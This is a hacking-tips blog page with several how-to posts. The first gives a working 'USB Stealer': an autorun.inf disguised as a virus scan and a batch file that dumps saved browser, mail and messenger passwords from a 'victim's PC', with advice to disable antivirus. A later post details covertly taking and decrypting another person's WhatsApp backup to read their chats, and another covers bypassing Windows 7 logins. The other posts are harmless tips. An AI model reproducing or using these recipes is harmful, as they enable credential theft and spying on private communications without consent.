Showing posts with label HOW TO. Show all posts
Showing posts with label HOW TO. Show all posts

Saturday, 9 July 2016

How to create a USB Stealer


Welcome back to THE HACKERS POINT. Friends, today I am here with a new trick or you can say tutorial 'How to create a USB Stealer'.
          As you, all know that windows store most of its passwords in browser. e.g. in chrome,firefox etc. as most of the users have not enough time and they allow browsers to save their passwords. 
Taking the advantage I am here to teach you How to create a USB Stealer.

First of all, these are the things which you need:

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:


Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc


IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.


Protected storage pass viewer(PSPV) -  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.

Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

Note: Please disable your antivirus before performing all these steps.

1.First of all download all 5 tools and copy the executables (.exe( files in your USB  i.e. Copy the files  mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it


[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.


3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now you're ready with your USB stealer. Insert your USB in victim's PC and a popup window appear, in popup window select (launch virus scan) and you will get the passwords in .txt file.

Hope you like my post.
Share with your friends.


Wednesday, 29 June 2016

HOW TO TRACK YOUR LOST ANDROID PHONE


Track cellphone and tablet


Your Android phones are the most important things in our today's life. It contains all your important contacts and information. If you lose your equipment, you will be losing all those sweet memories with the photos and video. But there is some good news to android phone/tablet users, you can now easily find or at least know where your missing phone is with or without using android application.
Let’s first look at the way of finding your lost phone which doesn’t contain any app installed on it.

Use the IMEI Number

Every android phone carries a unique IMEI number (International Mobile Equipment Identity Number). It will be printed at the back of your device. If you are unable to find the number, you have to launch your phone app and dial the number *#06#. This will give you the IMEI number of your phone. Store this number in a safe place so that it helps you in locating your phone when it is lost.
When you file a complaint, this number has to be added in the report. Your service provider uses this number to track your phone and tell you where it is. No matter if the person using the phone is using a different SIM card or has switched off the phone. Once the device is traced, you can request your service provider to block it from using.
This is one of the easy ways of locating your lost Android phone or tablet.

Plan B

Another way of tracking your lost Android gadget in no time is through Plan B app. This app does not require you to install any recovery software previously but still helps in finding your lost phone. All you need to do is log on to your Google play account. Lookout mobile security offers free software called Plan B. Download the software from play store to your phone. This will be possible only if your phone is within the Internet coverage area. Wait for some time and then send the keyword “locate” without the quotes through SMS to your phone. And a map showing where your equipment is will be sent to your Gmail account. This app is very much useful in situations where you don’t have IMEI number.
If you have installed and configured any of these below android software previously, there is good chance of finding it.
You can log on to Google Play store > My Android Apps, on your computer and check if you have installed any of the following apps previously.

Lookout Security and Antivirus

Lookout is the best android app for security and antivirus. So far, it has received millions of downloads. Just recall if you have installed this on your phone.
If you have activated the option “Missing Device” in this app, it is easy to find your device. If you have also enabled “Signal Flare” option, you can trace the last known location of your android device. This is helpful in case your phone battery is dead or tablet is switched off.
Now sign in Lookout to locate your device. The map shows the location of your phone. If you are at a short distance from the tablet, you can choose Scream option to make a loud noise to find it.

Android Device Manager

Google has recently released a new locator feature for Android gadgets called Android Device manager, which helps its users locate their lost or stolen phones and tablets. It functions in the same way as Lookout and Samsung’s “Find My Mobile”. Here’s how to use Android Device Manager.
Go to the Google Settings app, then select Android device manager. By default the locator feature is activated but to activate remove data wipe, select the box next to “Allow remote factory reset”, then select “activate”.
To use this feature, open the sitehttps://www.google.com/android/devicemanager and sign in to your Google account. You may be prompted for permission to allow Android Device Manager to use location data. Select the Accept tab to continue.
Now you will be provided with a map that shows the location of your device along with other details such as the name of the place, when it was last used and more. The location data doesn’t help you if your phone is misplaced somewhere in your home. Instead of making a call to your phone using other’s phone, you can call your phone directly from Android Device Manager. This will make your device to ring with high volume for 5 minutes, even if it’s in silent or vibrate mode.
One feature that is missing in Android Device Manager is remote locking, which can be useful in preventing a stranger from accessing your data, while you’re tracking its location.
Apart from these, there are other apps such as Android Lost, Where do My Droid and GadgetTrak that help you in finding your lost Android phone/Tablet.
hope you like it.   Don't forget to share and comment. 
FOLLOW ME FARHAN AHMAD.

Tuesday, 21 June 2016

HOW TO HIDE ANY DRIVE USING COMMAND PROMPT IN WINDOWS

Friends!!! Welcome to new post about how to hide/unhide any drive using command prompt. Yes. You looked right!! WE CAN.

  On our personal computer or a laptop, we love to hide our personal data such as photos, videos etc. from the preying eyes of infiltrators. In those circumstances, we mostly prefer to hide a particular folder.But this method is not new and people have become aware of this trick as well and they can now see the hidden folder easily under the menu option provided by the Windows.
So, If in this case, you can hide an entire drive using some simple commands. Yeah! SOUNDS COOL!! Here are some steps to hide/unhide any drive in Windows using command prompt.
           
Hide any drive in Windows using Command Prompt:
To hide any drive in Windows using CMD, follow the steps mentioned ahead. 

For this tutorial purpose and to be on the safer side, I have just created a new volume named ‘F’ and I am going to execute the following commands and see if it’s going to work out.
  • Open command prompt with ‘Run as administrator’ permissions.

  •  Type the command “Diskpart” in your command prompt. If any popup appears then, just press yes and it will open up a new window in your command prompt.

  • Then type list volume and you can see that all the volumes are listed down after your press enter.
    Looking closely, you can see that all the volumes have a volume number like 1, 2, 3, 4 etc. and each volume is assigned a letter such as C, D, E, F etc.

  • Now remember the volume number you want to hide. In my case, I want to hide my newly created volume assigned the letter F and it has volume number 4.
  • Now type select volume 4 and press enter. (Your volume number could be different than mine in this case). Once you’ve selected a volume, you will also get a message.

In the next step, we are going to hide the volume 4 or the volume you have selected in your case. In my case, for volume 4, the letter is ‘F’. In your case, the letter could be C, D, E, F etc.
So, recognize the associated letter with the drive and follow the last steps below:
  • Type remove letter F in our command prompt.
And it’s done. The selected drive has been hidden successfully.
----

So, it works. Now, let’s unhide the same drive.
To unhide any drive in Windows using command prompt, follow the steps below:
  • Close your command prompt and follow the first four steps shown above (until select volume 4).
  • Now, type assign letter F (your drive letter in this case) and then press enter. Now your hidden drive is up and working in no time.

With these commands executed, you can simply hide any drive in Windows using Command prompt to protect your personal and sensitive data.
"If you face any problem in executing these simple commands to hide any drive in Windows using Command prompt, you can let us know in the comments below."

HOW TO INCREASE SECURITY TO WHATSAPP

The hugely popular messaging platform WhatsApp made big news in the security community when they announced earlier this month that they were now providing end-to-end encryption for all of their one billion plus members.
This is an incredibly positive development for privacy advocates. The best part about this new feature is that WhatsApp users did not have to do anything in order to take advantage of this new feature. It is rare that security improvements are this easy.
Even though one need not do anything to take advantage of WhatsApp's new end-to-end encryption, there is a way to make your WhatsApp conversations even more secure when chatting with folks you know personally.
WhatsAppThe problem is this. When exchanging private communications with someone, you can never be 100% certain that the person on the other end of that communication is who they purport to be.
The "last mile" that ensures that you are communicating with the person whom you think you are communicating with requires that you meet that person face-to-face. This is true of all encryption mechanisms.
The first setting that you should enable, therefore, is the one that notifies you if a WhatsApp friend changes their device.
Why would you care about such a setting? Well, because if someone removes the SIM card from your friend’s phone and uses it in another device, they could impersonate your friend on WhatsApp. Enabling a setting in WhatsApp will give you notice that you may be communicating with an imposter.
The way to protect yourself is to go to the “Settings” icon at the bottom right of your WhatsApp screen, open up the Account settings area, and turn on the "Show Security Notifications" setting.
Whatsapp settings
But wait, there’s more!
The next time you are face-to-face with your WhatsApp friend, and you want to increase your WhatsApp security even more, here are the simple steps to do so.
First, make sure that WhatsApp has access to your camera. You may have already allowed this when you installed WhatsApp, but if you did not, it is an easy setting in your Applications area of your phone.
Next, open a conversation with your friend in WhatsApp and then select the person’s name at the top of the conversation. This will open the contact window for that person. Near the bottom of that screen you will see a setting for Encryption.
Whatsapp settings
Tap on the encryption field, and you will be presented with a screen that displays a QR code as well as a 60-digit decimal code that represents the contents of that QR code.
Whatsapp QR code
At the bottom of the QR code screen, there is a link that will enable you to scan your friend’s code, and they can do the same for your code. This is why you need to allow camera access in WhatsApp, even if only temporarily.
That is all there is to it. Now, when you communicate with your friend, you can be more confident that they are who they say they are - although, of course, it's always possible that the person you are speaking to has failed to keep a close eye on their smartphone or has failed to set a strong passcode.
WhatsApp has performed a magnificent feat in bringing end-to-end encryption for all communications to so many people. For those of us who wish to have authenticity when communicating, WhatsApp has gone that extra step to ensure that as well.
Well done, WhatsApp!

Wednesday, 18 May 2016

HOW TO HACK A COMPUTER

The question “how to hack a computer” is probably the one that is most frequently asked by many Internet users and hacking enthusiasts. So, in order to address some of the common questions and doubts on the subject, I have decided to write down this article. If you are looking for information on possible ways to hack a computer, this post can surely help you out.

What Computer Hacking Really Means?
Computer hacking is a vast subject and it has several different meanings. For example, when someone superficially asks how to hack a computer, it can simply mean how to break the password of a local or remote computer so as to gain access to it. However, hacking is not only that which involves breaking into a computer. If you go deeper, computer hacking can also involve things like techniques to bypass the authentication of a system, hack Internet users, computer databases, software programs and so on.
So, to define in simple words computer hacking is a means of exploiting the weakness in a computer system or network in order to gain unauthorized access to its data or take advantage of it.

How Can I Begin to Hack?

To hack a computer, you need to do know how computers actually work and learn some basic concepts on the subject. If you are serious and passionate about it, you can take up an ethical hacking course that will help you master the skills. You can pick up a book that will teach you the concepts of computer hacking right from the basics. If you are a beginner, we recommend the book“Hacking Secrets Exposed” which is an excellent source of information to start off.




What Skills Do I Need to Hack a computer?

Even though there exists a lot of ready-to-use tools and programs on the Internet, you should possess at least a fair amount of computer knowledge to make use of them. Things like basics of operating system, computer networks and their protocols, firewalls and knowledge of how each of these work seems necessary. If you want to take it up as a profession and want to become an ethical hacker or penetration tester you will have to go a few steps further and consider learning operating systems like Unix/Linux and also programming languages like HTML, C, PHP, JavaScript, SQL etc.
If you are completely new to hacking and only have a basic knowledge of computer, you can refer freely available resources on the Internet to develop your skills. However, if you need an easy to follow guide with all the necessary resources at one place and don’t mind spending a few dollars, go for the bookHacking Secrets Exposed which is a perfect source of learning for beginners and intermediate readers.

Is Computer Hacking Legal?

In most cases hacking a computer without the permission of its owner is considered illegal. However, there are many ethical hackers who are hired by large companies and government organizations with special permissions to break into a computer in cases such as catching a cyber criminal or terror group. Sometimes penetration testers are given prior permission to hack computers so that possible vulnerabilities could be found and patched up before another hacker exploits it. In such cases it is completely legal to hack a computer.

IF YOU HAVE ANY PROBLEM RELATED TO MY POSTS OR ANY OTHER TOPIC YOU WANT TO KNOW YOU CAN EMAIL ME.
If you like my post, comment below.

Sunday, 29 November 2015

HOW TO ACCESS BLOCKED WEBSITES

How to Access Blocked Websites, View Restricted Sites

Most of us find ourselves in situations where a website we wish to visit is blocked by a software or by our ISP (Internet Service Provider). So the question arises, how can we access blocked websites? The answer to this is simple: Proxy websites. Before going into details, let us know a bit about these proxy websites. 

Proxy Websites

A proxy website acts as an intermediate source between the user and server the site being contacted is hosted on. Users send requests to proxy websites which conveys them to the site's server. The reply received by the proxy website is then forwarded to the user's computer. This gives an impression to ISP's and blocking software that the user is visiting the proxy website but in reality, s/he is visiting the site which was blocked. Thus, proxy servers also provide extra security to users by hiding their online activities from their ISP's.

Acess Restricted Websites

Commonly Blocked Web Sites

The sites which are most commonly blocked at workplaces, schools and offices include websites like Facebook, Orkut, Blogger (blogspot), Google News, Typepad, eBay, MySpace, YouTube, MSN, Yahoo! Messenger, Bebo, Google Talk, Gmail, Photobucket, AOL AIM, Flickr, Twitter etc. In some countries, social bookmarking sites like Digg and Reddit are also blocked. Countries like Saudi Arabia, Pakistan, China have even blocked access to mainstream media websites like The New York times. A proxy website can be used to easily access these blocked websites. As proxy websites hide a user's location, they can also be used to access popular websites which are restricted to particular countries and block users from other countries from visiting them.

Types of Proxies

There are two types of proxies. First, there are web proxies which have an interactive interface; and second, the proxy servers which work on the basis of IP Addresses and port numbers. Proxies can also be segregated on the basis of anonymity into Anonymous, Transparent and High Anonymous depending upon the amount of privacy they provide.

How to Find Proxy Websites and Proxy Servers

A simple Google search containing the word "proxy websites" is likely to return a lot of useful results. However, most of them are likely to be lists containing proxy servers which you can setup using their IP Address and Port Number. So, in order to find interactive proxy websites, you will have to search for something like "Facebook Proxy Server" or "Twitter Proxy Server". A search like this is most likely to return interactive proxy websites with which you can access your blocked website by simply entering the URL in URL field. If you want additional security and anonymity, you can opt for a paid proxy server.

If you do not want to search, here are few popular free proxy websites you can use:-
  1. http://www.spysurfing.com/
  2. http://proxify.us/p/
  3. http://kproxy.com/

How to access Blocked websites

How to Setup Proxy Servers using their IP Address

If you wish to visit your blocked website using a web proxy, you do not need any setup. However, if you wish to use a proxy server that can only be accessed by using its IP address and port number, you must configure your browser to use it. Follow the instructions given below to setup this type of proxy in your browser:-

Google Chrome and Internet Explorer Users

Google Chrome uses the same network settings as Internet Explorer. So, in order to configure Google Chrome to use a proxy server, you have to configure Internet Explorer. You can configure a proxy server in Internet Explorer by following the instructions given below:-

  1. Start Internet Explorer.
  2. Click on ToolsInternet Options.
  3. Click on Connections Tab, select your Network Connection and click on Settings.
  4. Check on Use a Proxy Server for this Connection.
  5. In the Address field, add the IP Address of your Proxy server. In the Port field, enter the Port Number.
  6. Click on OK and OK again.

Mozilla Firefox Users

Mozilla Firefox users can configure their browser to use a proxy by following the instructions given below:-

  1. Start Mozilla Firefox.
  2. Click on ToolsOptions.
  3. Click on Advanced Tab.
  4. Click on Network tab.
  5. Click on Settings.
  6. Encircle Manual Proxy Configuration.
  7. Enter the IP Address and Port Number at the appropriate place. In most cases, it will be a HTTP server.  
After you have successfully configured your browser to use the proxy server, you will be able to access blocked websites whenever you browse the internet with your browser.

HOW TO HACK WINDOWS 7 PASSWORD

How to Hack Windows 7 Administrator or User Password?


hack windows 7 password

Hack Windows 7 Password without Software


There are 2 types of account on Win 7 by default. There is local account or Windows live or hotmail account. The former stores the login on PC, while the latter connects to the online hotmail or live email id. Here I would like to show you Windows 7 password reset with default Windows 7 administrator account.

Tip 1: Hack Windows 7 Login Password with Default Windows 7 Administrator Account


First you need to boot Win 7 in safe mode as it is disabled in normal mode. When you are in safe mode, this default Windows admin account enabled to login Win 7 with a blank password. The you can remove the forgotten user account under users in control panel. Below is step by step guide for you:

1. Press on the F8 key while you start Windows 7 until your PC displays the boot menu.
2. Select Safe Mode option and press the Enter key
3. Then a login box appears, click on Administrator in the username box and leave the password field as blank, click on OK to login.
4. Now you can open Control Panel, then in User Accounts you can reset any user password easily.

Tip 2: Hack Password Windows 7 with Password Reset disk


It seems quite simple to hack Windows 7 password if you have Win 7 password reset disk. Assure that you have created it in advance. Otherwise, you change to hack Windows 7 password is over. Now you lost Windows 7 password, it is time for you to find it and use it. It is easy to reset Windows 7 password with it, what you need to do is follow the step by step wizard to create a new login password to the current user.

If the above Windows 7 password hacker methods don’t work at all for you, don’t worry. These windows 7 password hacker methods in the above list are helpful, but might be unsuitable for your case. In this condition, you can have a try Windows password reset tool designed for Win 7.

Hack Forgotten Windows 7 Password with Software


One of the popular Windows 7 password hacker tool which is confirmed to replace your forgotten windows 7 password with blank so that you can login without entering any password, it is Windows Password Key. Besides hacking a local account password this tool will also show you how to break main user account password.

Windows Password Key resets any Windows password, such as Windows 8/7/Vista/XP/2012/2011/2008/2003/2000. It can hack domain passwords as well. No matter how complicated your Windows 7 password, Windows Password Key can reset it within 4 minutes. It’s easy to use, whether for beginners or advanced users. And it comes with ready-only and non-destructive designs to make sure it has no data loss on your computer. You can go to its official website to for more information: www.lostwindowspassword.com

After reading this article, you should have learned how to hack Windows 7 password when you forgot or lost the password. If not, read it again. By the way, you can also hack Windows 8/Vista/XP/2012/2011/2008/2003/2000 password as these methods.

Sunday, 22 November 2015

HOW TO FIND COMPUTER AND ANDROIND IP ADDRESS

Find out your Computer and Android Phone IP Address

IP address is the unique number given by internet , when you connect your PC or any internet related devices with Internet Network. Without IP address you can’t connect your system with Internet or in LAN. There are many tricks for finding out your computer or mobile phone ip address. But here we give you simple and easy to use tricks for finding ip address. With these tricks you can figure out your ip address in second.




                                                                    IP Address

 

Find Computer IP Address

Find Computer IP Address from Command Prompt



Press Window + R and type cmd, press enter.



                                              Run from CMD


Now you see CMD Prompt is open, type ipconfig and press enter.
You will find you IP Address in Command Prompt.



                                                                  IP Address from CMD

Find Computer IP Address from Google

Now the Second option is from Google, Type what is my ip in Google search box and hit search button. Google will give you result look like below picture.



                                                               what is my ip from google

 

Find Computer Address from Website

Last and most used popular option is from website, openwhatismyipaddress.com and you see your ip address.
So, I hope you will be able to find your IP address using any of the above method.

 

 

 Find IP Address in Android Phone.

 

Find Android Phone IP Address from Google

 

Open Your Mobile Browser in Android Mobile. Now Search what is my ip in Google. You see your IP Address in Google result.



               Android Mobile Ip Address

Find Android Phone IP Address from Android App.

You can also see your ip address from this amazing android app. You need to download this android app from google play store . Open this app and see you mobile phone  ip address.




                     IP Tool Android App






Developer: AmazingByte
Price: Free*






Now you get you ip address from these simple and easy to use tricks.

Sunday, 8 November 2015

HOW TO HACK WHATSAPP


HOW TO HACK WHATSAPP


On Daily we have heard news about online services is suffering from a lack of security. In February WhatsApp has been down for nearly four hours,
as if this were not enough, people became aware of the security flaw that allows conversations that should be read by anyone provided it learn properly perform the procedures.

Steps to follow:
1 - First of all you need to have the device at hand, use the Social Engineering and be quick in getting the e-mail and backup files msgstore-2014-05-02.1.db.crypt5.
To get the email for this follow the procedures below.


Enter the Play Store and view the e-mail, or write down mentalize somewhere without the person noticing.


Now Go to the device settings from Settings -> Accounts & Sync, look for the email from Google and mentalize or write down somewhere without the person noticing.


2 - Now let's take the msgstore-2014-05-08.1.db.crypt7 file To do this, use Polaris Office or any other app that allows you to navigate between folders and manage files.

Follow this path: My files -> WhatsApp -> Databases - In this directory you will find all the backup files of your messenger.
When you do find the file sharing for your mobile phone via bluetooth.



3 - Have we got the e-mail and file backup http://whatcrypt.com/?cmd=_decrypt
we enter the site and send the backup file.

To Submit follows:
Account: Enter the email of the victim
Database: Select the database backup
Click Process / download zip
Save the zip file on your desktop


4 - Once you have downloaded the backup file in zip format we now need to download the tool to extract the backup and we have access to conversations. Save on the desktop.




5 - From the desktop to extract the file WhatsApp Decrypt.zip install python-3.4.0 folder and enter the WhatsApp.
Browse by: WhatsApp -> Whatsapp_Xtract_V2.1_2012-05-10-2


When you install python-3.4.0 do the following steps:

1 - Go to My Computer, click with the right mouse button and Properties -> Advanced System Settings

2 - In the System Properties navigate to the Advanced tab -> Environment Variables

3 - Environment Variables look for Path

4 - Edit the PATH

5 - At the end of PATH add ;C:\Python34
6 - Click ok and close

6 - Now extract the file from step 3 msgstore_decrypted on the desktop, copy and paste it on WhatsApp folder -> Whatsapp_Xtract_V2.1_2012-05-10-2 and replace the file



7 - Replace the WhatsApp folder -> Whatsapp_Xtract_V2.1_2012-05-10-2 from step 5 and
look for msgstore.dll file, drag it onto the whatsapp_xtract_drag'n'drop_database file (s) _here


After you drag it will create a file called msgstore.db.html the folder and ask you to press any key at the command prompt to continue ...
Pressing any key it will open in your default browser displaying the file msgstore.db.html all conversations, dates, numbers, etc...


Note: In step 2 print shows the crypt 7 but the crypt is correct 5!


Disclaimer: This tutorial is educational purpose only. HOC is not responsible for any kind of illegal activities. We believe in Security.